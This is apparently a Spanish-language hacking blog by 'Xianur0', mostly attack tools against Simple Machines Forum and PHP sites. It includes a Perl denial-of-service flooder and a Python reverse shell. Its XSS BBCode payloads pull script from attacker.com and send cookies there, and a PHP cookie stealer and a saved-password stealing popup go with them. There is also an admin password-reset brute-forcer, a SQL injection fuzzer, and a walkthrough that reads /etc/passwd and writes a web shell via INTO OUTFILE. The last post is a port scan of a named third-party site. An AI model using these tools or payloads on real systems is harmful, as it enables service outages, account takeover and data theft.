my $host = $ARGV[0];
my $path = $ARGV[1];
my $user = $ARGV[2];
my $numero = $ARGV[3];
my $password = $ARGV[4] || die("\nUso: smf.pl [host] [Path] [usuario] [Numeros Registros] [password]\n");
$o=0;
$e=0;
$a=189;
$cookie = logear();
for($i=133;$i<=$numero;$i++) {
if($i>=255) {$i=0;$o++;}
if($o>=255) {$o=0;$e++;}
if($e>=255) {$e=0;$a++;}
if($a>=255) {die("No Mas IPs :)..");}
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp',  Timeout=>'1', );
if(!$sock) {print "No se Pudo Conectar a $host!\n"; } else {
$ip = $a.".".$e.".".$o.".".$i;
$paquete = "HEAD $path HTTP/1.1\r\nHost: $host\r\nCLIENT-IP: $ip\nCookie: ".$cookie."\n\n";
$i++;
$ip = $a.".".$e.".".$o.".".$i;
$paquete .= "HEAD $path HTTP/1.1\r\nHost: $host\r\nCLIENT-IP: $ip\nCookie: ".$cookie."\n\n";
print $sock $paquete;
print "\r\nEnviados $ip\r\n";
}}


sub logear() {
my $req = HTTP::Request->new(POST => "http://".$host."/".$path."?action=login2");
$req->content_type('application/x-www-form-urlencoded');
$req->header("CLIENT-IP" => "127.127.127.127");
$req->content("user=".$user."&passwrd=".$password."&cookielength=-1");
my $res = $ua->request($req);
$response = $res->as_string;
@headers = split("\n",$response);
foreach $h (@headers) {
@hs = split("Set-Cookie:",$h);
$cookie .= $hs[1];
}
if($cookie eq "") {
die "\n[!] No se Puede Encontrar la cookie :S\n";
} else { print "[-] Cookie Detectada: ".$cookie."\n";}
return $cookie;
}

tira un foro SMF en menos de un minuto :)

usuario: el usuario que crearon en el foro
password: la password de dicho usuario
Numero de Registros: la cantidad de mensajes que se enviaran en total (este numero se multiplica por 2 y sera el numero de paquetes que el servidor leera por ejemplo si quiero que el servidor se caiga durante mas o menos 1 hora, coloco 5000)

publicado! no hagane stupideses que yo no me hago responsable de nada simplemente les puse el ejemplo de la debilidad del SQL del SMF ante este tipo de situaciones...

Moderation on MITM Forum

2009-02-07T21:22:00.000-08:00

Nominations are Open For Moderation on MITM Forum

Minimum Requirements:

* 15 Posts Content (no spam, no opinions, no content copy & paste)
* Knowledge of the area to moderate
* Time to Keep Your area orderly

More Information:

http://forum.mitm.cl/index.php?topic=874.0

Firefox & SMF Password Stealing By Xianur0

2009-02-05T16:47:00.000-08:00

Firefox & SMF Password Stealing By Xianur0

bbcode example:


[iurl=javascript:document.write(unescape('%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%22%68%74%74%70%3A%2F%2F%77%77%77%2E%61%74%61%63%61%6E%74%65%2E%63%6F%6D%2F%65%76%69%6C%70%6F%70%75%70%2E%68%74%6D%22%2C%22%45%76%69%6C%20%50%6F%70%75%70%22%2C%22%74%6F%6F%6C%62%61%72%3D%6E%6F%2C%20%6C%6F%63%61%74%69%6F%6E%3D%6E%6F%2C%20%64%69%72%65%63%74%6F%72%69%65%73%3D%6E%6F%2C%20%73%74%61%74%75%73%3D%6E%6F%2C%20%6D%65%6E%75%62%61%72%3D%6E%6F%2C%20%73%63%72%6F%6C%6C%62%61%72%73%3D%6E%6F%2C%20%72%65%73%69%7A%61%62%6C%65%3D%79%65%73%2C%20%77%69%64%74%68%3D%35%30%38%2C%20%68%65%69%67%68%74%3D%33%36%35%2C%20%74%6F%70%3D%38%35%2C%20%6C%65%66%74%3D%31%34%30%22%29%3B%3C%2F%73%63%72%69%70%74%3E')+"test");][img]http://.[/img]http://e-r00t.s0me.co.cc

evilpopup.htm example:


<script>
window.opener.location.href='?action=login';
function alertar() {alert("User: " + window.opener.document.frmLogin.user.value + "\nPassword: " + window.opener.document.frmLogin.passwrd.value + "\nHacked! jejeje");}setTimeout("alertar()", 3000);
</script>

uno mas basado en la misma ciencia y en la falla de seguridad de firefox con el manejo de passwords guardadas jejejeje :)...

Advance Reverse Shell By Xianur0 [Python]

2009-02-04T19:50:00.000-08:00



#!/usr/bin/env python -u

# By Xianur0
# uxmal666@gmail.com

import sys, socket, os

if len(sys.argv) != 3:
 print "[x] Uso: %s [host] [port]" % (sys.argv[0])
else:
 host = str(sys.argv[1])
 port = int(sys.argv[2])
 handler = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 try:
  try:
   if os.fork() > 0: os._exit(0)
  except OSError, error:
   print 'Error En Fork: %d (%s)' % (error.errno, error.strerror)
   pid = os.fork()
   if pid > 0:
    print 'Fork No Valido!'
  handler.connect((host, port))
  print "\n[x] Advance Reverse Shell By Xianur0.... OK\n"
  os.dup2(handler.fileno(), sys.stdin.fileno())
  os.dup2(handler.fileno(), sys.stdout.fileno())
  handler.sendall(('\n<-------------------------Advance Reverse Shell By Xianur0-------------------->\n'))
  while handler.recv:
   handler.sendall(('\n\nXianur0:~ '))
   os.system('/bin/bash')
 except:
  print "[!] Error conectando"

XSS BBCode Exploit SMF All Versions

2009-02-02T12:48:00.000-08:00

Author: Xianur0

BBCode of the smf not filtered properly specified urls:

Código:

[center][size=14pt][url=javascript:alert('xss')]Saltando Filtro
:D...[/url][/size]
[url=javascript:document.write(unescape(%3Cscript+src%3D%22http%3A%2F%2Fwww.attacker.com%2Fexploit.js%22%3E%3C%2Fscript%3E))][img]http://img508.imageshack.us/img508/6982/flmnetworkuserbar494abfyb2.png[/img][/center]

Click on the image, run the javascript..

BBC Cookie Exploit:

Código:

[center][size=14pt][url=][/url][/size]
[url=javascript:
document.write(unescape('%3C%69%66%72%61%6D%65%20%77%69%64%74%68%3D%22%30%25%22%20%68%65%69%67%68%74%3D%22%30%25%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%61%74%74%61%63%6B%65%72%2E%63%6F%6D%2F%63%6F%6F%6B%69%65%73%74%65%61%6C%65%72%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%27%20%2B%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%20%2B%20%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%25%22%3E'));][img]http://www.google.com.mx/intl/es_mx/images/logo.gif[/img][/center]

PHP Cookie Stealer:

Código:

<?php
$cookie = $_GET['cookie'];
$handler = fopen('cookies.txt', 'a');
fwrite($handler, $cookie."\n");
?>

SMF all Versions XSRF/XSS/Package Upload Vulnerability

2009-01-23T22:40:00.000-08:00

Author: Xianur0
Vulnerable Version: All

http://securityreason.com/exploitalert/5590

[PoC] Problems Invalids DNS Records

2009-01-17T14:06:00.000-08:00

A classic error is that the DNS records are created by default "A" record that points to localhost 127.0.0.1, for example:
localhost.php.net = 127.0.0.1
If we make an HTTP GET query subdomain that the result is redirected to our own computer on port 80, so we can create an exploit that capture the data coming into this port (including cookies)

PoC Applet:

Código:

/*
* PoC Problems Invalids DNS Records.
* Author: Xianur0
* Credits:
* Pandora's Box Team: http://e-r00t.s0me.co.cc
* Infierno Hacker: http://www.infiernohacker.com/
*/
import java.applet.Applet;
import java.io.*;
import java.net.*;

//By Xianur0
//uxmal666@gmail.com

public class PoC extends Applet {
  public static void main(String args[])
{
 // Message terminator
 char EOF = (char)0x00;
 try
 {
  ServerSocket s = new ServerSocket(80);
  System.out.println("Server started. Waiting for connections...");
  // wait for incoming connections
  Socket incoming = s.accept();
  BufferedReader data_in = new BufferedReader(new InputStreamReader(incoming.getInputStream()));
  PrintWriter data_out = new PrintWriter(incoming.getOutputStream());
  // HTTP Response (Fake)
  data_out.println("OK - 200\nCache-Control: private, max-age=0\nDate=Sat, 17 Jan 2009 18:15:23 GMT\nExpires: -1\nServer: Xianur0Exploit\nContent-Type=text/html; charset=UTF-8\n\nXianur0 Was Here!\n\n" + EOF);
  data_out.flush();

  boolean quit = false;

  while (!quit)
  {
   String msg = data_in.readLine();
   if (msg == null) quit = true;
    System.out.println("HTTP Header: "+msg.trim()+EOF);
    data_out.flush();
  }
 }
 catch (Exception e)
 {
  System.out.println("Can not create socket!");
 }
}
}

only need to call the applet which created a socket to listen on port 80 and print data arriving ...

Nota: A los que decían que era imposible este bug simplemente les dire me salio el applet!! xDDDDDD

para que entiendan mas el como funciona:

http://xianur0.blogspot.com/2008/08/xss-otro-nivel.html

aunque supongo que ya es un tema muy simple de entender xDDD

SMF Destroyer 0.1 By Xianur0 [Priv8 Liberado]

2009-01-10T20:39:00.000-08:00


#!/usr/bin/perl

 use LWP::UserAgent;
 use Getopt::Std;
 use LWP::Simple;
 use HTTP::Request;

#By Xianur0
#Uxmal666@gmail.com

print "\n\n\x09\x09\x09\x09\x09SMF Destroyer 0.1 By Xianur0 [Priv8]\n\n";
my $url = $ARGV[1] || die ("Use: smf.pl [option] [Full URL] [Proxy:Puerto]\nOptions:\n-f Flood \n-p Search Directory Setup \n-l Installed Mods List \n-b Find Temporary\n-c  Link crack Activation (Recommended Use Proxy)");
version();
my $proxy = $ARGV[2] || "";
if($ARGV[0] ne "-c" && $proxy ne "") {
$ua->proxy(["http"], "http://".$proxy);
}

   getopts('fplbc', \%opt);
   crackeador() if $opt{c};
   flood() if $opt{f};
   path() if $opt{p};
   list() if $opt{l};
   temp() if $opt{b};

sub headers {
$req->header('Accept' => 'text/html');
$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3');
}

sub version {
$ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
$req = HTTP::Request->new(GET => $url);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
if ($html =~ /title="Simple Machines Forum" target="_blank">Powered by SMF (.*?)<\/a>/){
$version = $1;
print "\n[X] SMF Version: $version\n";
if($version < "1.1.7") {
print "\n[X] Outdated Version $version!!!!!!!!!!!\n\n[X] http://milw0rm.com/search.php?dong=smf".$version."\n\n";
}
}}}

sub path {
$req = HTTP::Request->new(GET => $url.'/SSI.php?ssi_layers');
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
if ($html =~ /Undefined variable: ssi_layers in <b>(.*?)SSI.php/){
print "[X] Directory: $1\n";
} else { print "[!] Getting error Directory!\n";}
}
}

sub flood {
print "[X] Starting Flood! (Press Ctrl + C To Finish)\n";
$texto = "Flood!!!!!" x 15;
$req = HTTP::Request->new(GET => $url.'/index.php?action=help;page['.$texto.']=loginout');
&headers;
for($i = 1; $i<10000; $i++) {
$res = $ua->request($req);
if ($res->is_success) {
print "[-] Sent: ".$i."\n";
} else {
print "[!] HTTP Error Query: " . $res->status_line . "\n";
}
}
}


sub temp {
@temps=('index.php~','Settings.php~','Settings_bak.php~');
foreach $temp (@temps) {
$req = HTTP::Request->new(GET => $url."/".$temp);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
print "[X] Temporary File Found: ".$url."/".$temp."\n";
} else {print "[!] Not Found: ".$url."/".$temp."\n";}
}
}

sub list {
$req = HTTP::Request->new(GET => $url."/Packages/installed.list");
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
my @htmls = split("\n", $html);
foreach $mod (@htmls) {
my @mod = split('\|\^\|', $mod);
print "[X]Package:\nDescription: $mod[0]\nFile: $url/Packages/$mod[1]\nName: $mod[2]\nVersion: $mod[3]\n\n";

}
}
}

sub crackeador() {
$url = $ARGV[0];
$nick = $ARGV[1];
$id = $ARGV[2] || die("Use: smf.pl -c [URL SMF] [Nick Admin] [ID Admin] [Proxy:Puerto]\nExample: smf.pl -c http://www.simplemachines.org/community/ dschwab9 179 www.carlosslim.com:3128\n");
my $reminder = $url."?action=reminder";
my $smf = $reminder.";sa=setpassword;u=".$id.";code=";
my $proxy = $ARGV[3];
if($proxy ne "") {
$ua->proxy(["http"], "http://".$proxy);
}

sub mail() {
my $content = HTTP::Request->new(GET => $reminder);
$contenedor = $ua->request($content)->as_string;
if ($contenedor =~ /Set-Cookie: (.*?)
/){
       print "\n[+] SESSION Detected: $1\n";
$session = $1;
} else { die "[!] SESSION could not be found!\n";}
if ($contenedor =~ /<input type="hidden" name="sc" value="(.*?)"/){
       print "\n[+] sc Detected: $1\n";
 $sc = $1;
} else { die "[!] SC could not be found!\n";}
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
 $req->content_type('application/x-www-form-urlencoded');
 $req->content('user='.$nick.'&sc='.$sc.'&=enviar');
 $req->header('Cookie' => $session);
my $res = $ua->request($req)->as_string;
if(!$res) {exit;}
print "[x]Sent!\n";

}

sub generador() {
my $password = "";
my $checksum = "";
my @chars = split(" ","0 1 2 3 4 5 6 7 8 9 a b c d e f");
for (my $i=0; $i < 10 ;$i++) {
 $_rand = int(rand 16);
 $password .= $chars[$_rand];
}
return $password;
}

sub brute() {
while($bucle ne "finito") {
$code = generador();
 my $fuente = $reminder.";sa=setpassword;u=".$id.";code=".$code;
 my $content = HTTP::Request->new(GET => $reminder);
 my $content = $ua->request($content)->as_string;
if ($content =~ /<input type="hidden" name="sc" value="(.*?)"/){
 $sc = $1;
} else { die "[!] SC could not be found!\n";}
if ($content =~ /Set-Cookie: (.*?)
/){
       print "\n[+] New SESSION Detected: $1\n";
$session = $1;
} else { die "[!] SESSION could not be found!\n";}
print "[+] Testing Code: ".$code."\n";
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
 $req->content_type('application/x-www-form-urlencoded');
 $req->content('passwrd1=xianur0washere&passwrd2=xianur0washere&code='.$code.'&u='.$id.'&sc='.$sc);
 $req->header('Cookie' => $session);
 $res = $ua->request($req);
 if ($res->is_success) {
    if($res->content =~ '<input type="text" name="user" size="20" value="') {
print "[-] Password Changed!\n[x] New password: xianur0washere\nUsername: $1\n";
exit;
}
} else { die "[!] HTTP response incorrect!\n";}}}

print "\n[-] Sending Mail...\n\n";
mail();
print "\n[-] Attacking code link recovery...\n";
brute();
}

Nota: Gracias Gente por hacerme notar que los códigos de los links tienen checksum :)..

la funcion del crackeador es la que esta activa en todos los SMF, es decir, no hay un sistema anti-flood/que filtre el probar códigos para resolver el link de recuperación, es decir envio el mail de recuperación a la cuenta del admin, y se le envia un link con un código de 10 caracteres que solo cubren letras y numeros, y además no hay un sistema que detecte cuando se esta usando un bot para probar los códigos del link (es decir se genera aleatorio 10 caracteres y se prueba intentar cambiar la password y si el admin no ve el correo en su bandeja, en un rato la tool lograra descubrir el código del link de recuperación y cambiar la password, por ende en un rato con esa tool ya tienes la cuenta del admin :)...)

todo esto automatizado (desde el envio del mail hasta el cambiar la password y generar el código).

Simple no?

Editor Hexadecimal PHP By Xianur0

2009-01-02T13:23:00.000-08:00


<?php
function html() {
print '<html>
<head><title>Editor Hexadecimal PHP By Xianur0</title></head>
<body>
<h1>Editor Hexadecimal PHP By Xianur0</h1>
<form method="post">
Path Archivo: <input name="archivo" type="text">
<br><input type="submit" value="Hex!">
</form>';
}
function descargar($descargar){
   header("Content-type: application/octet-stream");
   header("Content-Disposition: attachment; filename=cambiarnombre\n");
   print $descargar;
}
if(isset($_POST['archivo'])) {
define("path",$_POST['archivo']);
function detectar($byte) {
$linea = 1;
print "<form method='post'><textarea name='modificado' rows='20' cols='40'>";
for ($i = 0; $i < strlen($byte); $i++) {
if(is_int($i/8)) {$linea++; $caracter = "\n".$linea.". ";} else $caracter = " ";
$ordenados .= $byte{$i}.$caracter;
$ordenadosh .= ord($byte{$i}).$caracter;
}
print "1. ";
print $ordenadosh;
print "</textarea><textarea readonly='true' rows='20' cols='40'>";
print "1. ";
print $ordenados."</textarea><br><br><input type='submit' value='Guardar!'></form>";
}
$handle = @fopen(path, "rb");
$codigo = @fread($handle, filesize(path));
@fclose($handle);
detectar($codigo);
}
if(isset($_POST['modificado'])) {
function guardar($modificado) {
$lineas = explode("\n", $modificado);
foreach($lineas as $valor) {
$valores = explode(".", $valor);
$cadena .= $valores[1];
}
$caracter = explode(" ", $cadena);
foreach($caracter as $valor) {
$legible .= chr($valor);
}
descargar($legible);
}
guardar($_POST['modificado']);
exit;
}
html();
?>

Feliz Navidad Cabrones!!!!

2008-12-24T12:41:00.001-08:00

Atacando Headers HTTP By Xianur0

2008-12-21T22:01:00.001-08:00

me da la vagancia de pasarlo a html y publicarlo aqui, asi que les dejo el link al foro donde publique el paper...

http://foro.infiernohacker.com/index.php/topic,9186.msg52246/topicseen.html

Proyecto w3af

2008-12-11T12:45:00.000-08:00

pues estuve revisando mis correos cuando vi un mail de uno de los lectores del blog, y pues me comento de este proyecto, que sinceramente me paresio muy interesante:

El 11 de diciembre de 2008 12:27, José Ramón Palanco escribió:
Buenas,

que tal, llevo unas semanas siguiendo tu blog y es muy entretenido.
Me gustaría hablarte de un proyecto software libre en el que estamos
desarrollando, se llama w3af y es un framework de test de intrusion
web en python. Si no lo conoces estoy seguro de que te gustará. Por
otro lado si quieres hacer cualquier aportación, solo tienes que
enviarlo a la lista.

Web del proyecto: http://w3af.sf.net

les recomiendo leer la web del proyecto, es realmente muy bueno, aunque se le podrían agregar algunas cosas.

Felicidades a los miembros de ese proyecto :)..

Backdoors En Sesiones PHP By Xianur0

2008-12-10T16:24:00.000-08:00

Backdoors En Sesiones PHP By Xianur0

Simple, esto consiste en una mezcla de XSRF y Un mini Bug en las sessiones PHP
Que necesitamos?, simplemente que la web utilice sessiones y un clic del admin.

Vamos por un inicio, envenenar un sistema, solo se necesita de:

Código:

session_start();

localizamos un codigo con esa funcion publica, se necesita únicamente enviar una session falsa al servidor este la creara y sera utilizada por el usuario mientras dicha session exista en el servidor victima.

Código:

GET /vuln.php HTTP/1.1
Host: victima.com
Cookie: PHPSESSID=xianur0

En cuanto el servidor reciba esa consulta la funcion: session_start() de PHP, creara dicha session dentro del servidor (es recomendable haberla seteado en el navegador, para lo cual hay muchos metodos, pero ahora solo dare teoría).

entonces, ahora si esta seteada la session en el navegador y el usuario se logea en el servidor (el php usando sessiones para ello), la session xianur0 conteneria los datos:

Código:

$_SESSION['is_admin']="true";
?>

dentro del archivo sess_xianur0 se encontrara esto:

Citar

is_admin|s:4:"true";

entonces la session ya contiene los datos del usuario, ahora podemos usar dicha session (ya sabemos que la session es xianur0 jejeje).

Filtrado de Caracteres Mediante ASCII y PHP

2008-11-28T18:27:00.000-08:00



<?php
function detectar($ascii) {
for ($i = 0; $i < strlen($ascii); $i++) {
$byte = ord($ascii{$i});
if($byte >=48 && $byte <=57 || $byte >=64 && $byte <=90 || $byte >=97 && $byte <=122 || $byte == 46) {
$hex .= chr($byte);
} else { print "Injeccion de Caracteres Detectado!\n"; exit; }
}
return $hex;
}

foreach($_GET as $var => $value) {
$value = detectar($value);
$_GET[$var] = $value;
}

foreach($_POST as $var => $value) {
$value = detectar($value);
$_GET[$var] = $value;
}
?>

solo pasan letras, arroba, números (ni espacios pasan xD).

Multiples Tecnicas de Bypass

2008-11-23T14:59:00.000-08:00

Esta lista la iré llenando, pero por ahora pondré un vídeo (con sus respectivas herramientas que use de ejemplo).

Bypass

Video Bypass Sessiones PHP Mediante SQL Injection
Bypassear Logins Flashs

nota: Actualizado el vídeo, el anterior no se veía.

Economia For Dummies

2008-11-22T10:27:00.001-08:00

Felicidades a Ramón Redondo de Geek In Love
(clic en la imagen para ver completa)

Liquidez: En economía la liquidez representa la cualidad de los activos para ser convertidos en dinero efectivo de forma inmediata sin pérdida significativa de su valor.

Activos: Bienes con valor comercial que una compañía posee y que aparecen en su balance general, con inclusión de dinero en efectivo, equipo, inventario, etc.

Rootear Servidor Mediante SQL Injection

2008-11-20T19:05:00.000-08:00

No es tanto como rootear pero si se puede subir shell jeje..

Xianur0 ~ # perl fuzzer.pl http://localhost/vuln.php?id=
Imprime Columna: 0
Imprime Columna: 1
Imprime Columna: 2
URI Generado:
http://localhost/vuln.php?id=-10/**/UNION/**/SELECT/**/concat(0x46757a7a657242795869616e757230,0),concat(0x46757a7a657242795869616e757230,1),concat(0x46757a7a657242795869616e757230,2)

(utilizamos el mismo script que en el ultimo manual de SQL Injection que publique)

Fuzzer.pl:


#!/usr/bin/perl
#By Xianur0
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
my $uri = $ARGV[0];
$uri = shift || die("Uso: fuzzer.pl [URI a SQL Injection]\n");
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16");
my $inyeccion = "-10/**/UNION/**/SELECT/**/concat(0x46757a7a657242795869616e757230,0)";
$uri .= "$inyeccion";
for($i=1; $i<1000;$i++) {
$uri .= ",concat(0x46757a7a657242795869616e757230,$i)";
$req = HTTP::Request->new(GET => $uri);
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
if($res->content !~ "The used SELECT statements have a different number of columns") {
for($o=0; $o<=$i;$o++) {
if($res->content =~ "FuzzerByXianur0$o") {
print "Imprime Columna: $o\n";
}
} die "URI Generado: \n$uri\n";}}

ya que tenemos las tablas a donde imprime vamos a comenzar a recolectar informacion:

http://localhost/vuln.php?id=-10/**/UNION/**/SELECT/**/load_file(0x2f6574632f706173737764),1,2

nota: 0x2f6574632f706173737764 es el equivalente a /etc/passwd en hexadecimal

Si tenemos permisos de leer el archivo nos lo cargara.

Suponiendo que tenemos el directorio donde se encuentra la web tambien podemos leer archivos con datos interesantes, por ejemplo en este ejemplo podemos sacar la password del MySQL, la cual se encuentra en este archivo que estamos usando para el ejemplo, y sabiendo que la ruta es: /opt/lampp/htdocs/vuln.php

ahora podemos conectarnos al servidor MySQL.


<html>
<body>
<?php
function conectado()
{
print '<h1>Conectado!</h1><form action="" method="POST">
<textarea rows="10" cols="40" name="comando"></textarea><br>
<input type="submit" value="xEcut!">
</form>';
}

function inicio() {
print '<form action="" method="GET">
<b>Server: <input type="text" name=server><br>
User: <input type="text" name=user><br>
Password: <input type="text" name=passwd><br>
DB: <input type="text" name=db><br>
<input type="submit" value="Conectar">
</form>';
}

$link = mysql_connect($_GET['server'], $_GET['user'], $_GET['passwd']);
$conectado = mysql_select_db($_GET['db'], $link);
if($conectado) conectado();
if(isset($_POST['comando'])) {
$result = mysql_query($_POST['comando'], $link);
while ($row = mysql_fetch_row($result)){
echo '<textarea rows="10" cols="40">';
foreach($row as $indice => $valor) print $valor."\n";
print '</textarea><br>';
}
} else inicio();
?>
</body>
</html>

Tambien podemos crear archivos en el servidor, como por ejemplo:

http://127.0.0.1/vuln.php?id=-10/**/UNION/**/SELECT/**/0,1,0x3c3f7068700d0a696e636c75646528277368656c6c27293b0d0a3f3e/**/INTO/**/OUTFILE/**/'/opt/lampp/htdocs/shell.php'

Usemos La Shell:

http://127.0.0.1/shell.php?shell=/etc/passwd

Resultado:
root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin:/bin/false daemon:x:2:2:daemon:/sbin:/bin/false adm:x:3:4:adm:/var/log:/bin/false lp:x:4:7:lp:/var/spool/lpd:/bin/false sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/:/bin/false news:x:9:13:news:/usr/lib/news:/bin/false uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false operator:x:11:0:operator:/root:/bin/bash games:x:12:100:games:/usr/games:/bin/false ftp:x:14:50::/home/ftp:/bin/false smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash rpc:x:32:32:RPC portmap user:/:/bin/false sshd:x:33:33:sshd:/:/bin/false gdm:x:42:42:GDM:/var/state/gdm:/bin/bash apache:x:80:80:User for Apache:/srv/httpd:/bin/false messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false pop:x:90:90:POP:/:/bin/false nobody:x:99:99:nobody:/:/bin/false

También podemos poner en vez de /etc/passwd la url a una shell php.

suponiendo que no tenemos acceso a editar esa carpeta, bueno podemos crear el php en el directorio tmp, y llamar la shell mediante un LFI (por dar un ejemplo).

tambien se puede sacar las DBs enteras mediante load_file(), ya que los archivos de la DB se localizan en: /var/mysql/
Los archivos mas interesantes son los: .MYD jeje, solo recuerden que no están del todo ordenados (están llenos de caracteres ilegibles humanamente hablando).

Pero para ello programe un codigo para eliminar dichos caracteres:



<?php
print "<title>Purificador de Caracteres By Xianur0</title><h1>Purificador de Caracteres By Xianur0</h1><form method='POST'><textarea rows='10' cols='30' name='code'></textarea><br><input type='submit' value='Limpiar!'></form>";
function ascii2hex($ascii) {
for ($i = 0; $i < strlen($ascii); $i++) {
$byte = ord($ascii{$i});
if($byte >=21 && $byte <=126) {
$hex .= chr($byte);
}}
return $hex;
}

if(isset($_POST['code'])) print "<br><b>Texto Limpiado: <br></b>".htmlentities(ascii2hex($_POST['code']));
?>

Nota: Vengador de las Sombras te voy a mandar a estudiar geometría xD.
http://es.wikipedia.org/wiki/Pentagrama_(geometr%C3%ADa)

Multiple Vulnerabilities in SMF (Simple Machines Forum) (0days)

2008-11-16T15:48:00.000-08:00

lo posteo tal cual lo envie a milw0rm :)..

0days jejje

Author: Xianur0
Affected Versions: All
Vendors: Simple Machine Forums
Vendors Webpage: http://www.simplemachines.org/

XSRF PoC (http://attacker.com/packages.xml):


<?xml version="1.0"?>
<!DOCTYPE modification SYSTEM "http://www.simplemachines.org/xml/package-list">
<!-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
XSRF PoC By Xianur0
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -->

<package-list xmlns="http://www.simplemachines.org/xml/package-list" xmlns:smf="http://www.simplemachines.org/">
<list-title>Xianur0 Was Here</list-title>

<section>
    <title>SMF XSS PoC By Xianur0</title>
    <text><![CDATA[<script>alert('XSS')</script>]]></text>
    <modification>
        <id>Xianur0:XSMF</id>
        <name>SMF PoC By Xianur0</name>
        <filename>smfexploit.zip</filename>
        <version>0.1</version>
        <author email="uxmal666@gmail.com">Xianur0</author>
        <description><![CDATA[<script>alert(document.cookie)</script>]]></description>
    </modification>
</section>
</package-list>

XSRF:

Código:



<iframe src ="http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com" width="0%" scrolling=no width=0%></iframe>

Others Details:

The Log Errors basically keeps any minimum error caused by users, good and if it saturated?

http://www.web.com/foro/index.php?action=help;page[]=loginout
(Full path disclosure)
This created a record of error in the log:

2: Illegal offset type in isset or empty
File: /var/www/xxxxxxxxxxxxxx.com/htdocs/Sources/Help.php
Line: 65
?action=help;page[]=loginout

This error is in Sources/Help.php on line 65:



if (!isset($_GET['page']) || !isset($context['all_pages'][$
_GET['page']]))
$_GET['page'] = 'index';

Correction:

Código:



if (!is_array($_GET['page']) && !isset($_GET['page']) || !is_array($_GET['page']) &&  !isset($context['all_pages'][$_GET['page']]))
$_GET['page'] = 'index';

Errors handling packages:

Error handling packages for temporary, the SMF to upload a mod and run it makes a backup of each PHP file that is touched, but at the end of the amendment, not erased, then this can be accessed by any other user:

http://www.victima.com/index.php~
http://www.victima.com/Settings.php~

Error leaves Files:
Some of the SMF files are not protected as they should, for example:

http://www.victima.com/Packages/installed.list

This can be used for scan packet (many packets that are sent to SMF have security flaws such as XSS, SQL Inyection and in some cases RFI)

Getting Directory installation of SMF (useful for attacking free hostings)

http://www.victima.com/SSI.php?ssi_layers

Result:

Notice: Undefined variable: ssi_layers in/home/web/public_html/forum/SSI.php on line 99
Hacking attempt ...

It also serves to create heavy logs as these mistakes are stored directly on:

http://www.victima.com/error_log

Tool:



#!/usr/bin/perl

use LWP::UserAgent;
use Getopt::Std;


my $url = $ARGV[1] || die ("Use: smf.pl [Full URL] [option]\nOptions:\n-f Flood \n-p Search Directory Setup \n-l Installed Mods List \n-b Find Temporary\n");


$ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');

    getopts('fplb', \%opt);
    flood() if $opt{f};
    path() if $opt{p};
    list() if $opt{l};
    temp() if $opt{b};

sub headers {
$req->header('Accept' => 'text/html');
$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3');
}

sub path {
$req = HTTP::Request->new(GET => $url.'/SSI.php?ssi_layers');
&headers;
$res = $ua->request($req);
if ($res->is_success) {
 my $html = $res->content;
 my @htmls = split('Undefined variable: ssi_layers in <b>', $html);
 my @htmls = split('SSI.php</b>', $htmls[1]);
if($htmls[0] ne "") { print "Directory: $htmls[0]\n"; } else { print "Getting error Directory!\n";}
}
}

sub flood {
print "Starting Flood! (Press Ctrl + C To Finish)\n";
$texto = "Flood!!!!!" x 15;
$req = HTTP::Request->new(GET => $url.'/index.php?action=help;page['.$texto.']=loginout');
&headers;
for($i = 1; $i<10000; $i++) {
$res = $ua->request($req);
if ($res->is_success) {
print "Sent: ".$i."\n";
} else {
print "HTTP Error Query: " . $res->status_line . "\n";
}
}
}


sub temp {
@temps=('index.php~','Settings.php~','Settings_bak.php~');
foreach $temp (@temps) {
$req = HTTP::Request->new(GET => $url."/".$temp);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
print "Temporary File Found: ".$url."/".$temp."\n";
}
}
}

sub list {
$req = HTTP::Request->new(GET => $url."/Packages/installed.list");
&headers;
$res = $ua->request($req);
if ($res->is_success) {
 my $html = $res->content;
my @htmls = split("\n", $html);
foreach $mod (@htmls) {
my @mod = split('\|\^\|', $mod);
print "Description: $mod[0]\nFile: $url/Packages/$mod[1]\nName: $mod[2]\nVersion: $mod[3]\n\n";

}
}
}

www.carlosslim.com

2008-11-07T18:01:00.000-08:00

Puertos abiertos:

PORT STATE SERVICE
23/tcp open telnet
25/tcp filtered smtp
53/tcp open domain
80/tcp open http
514/tcp open shell
554/tcp open rtsp
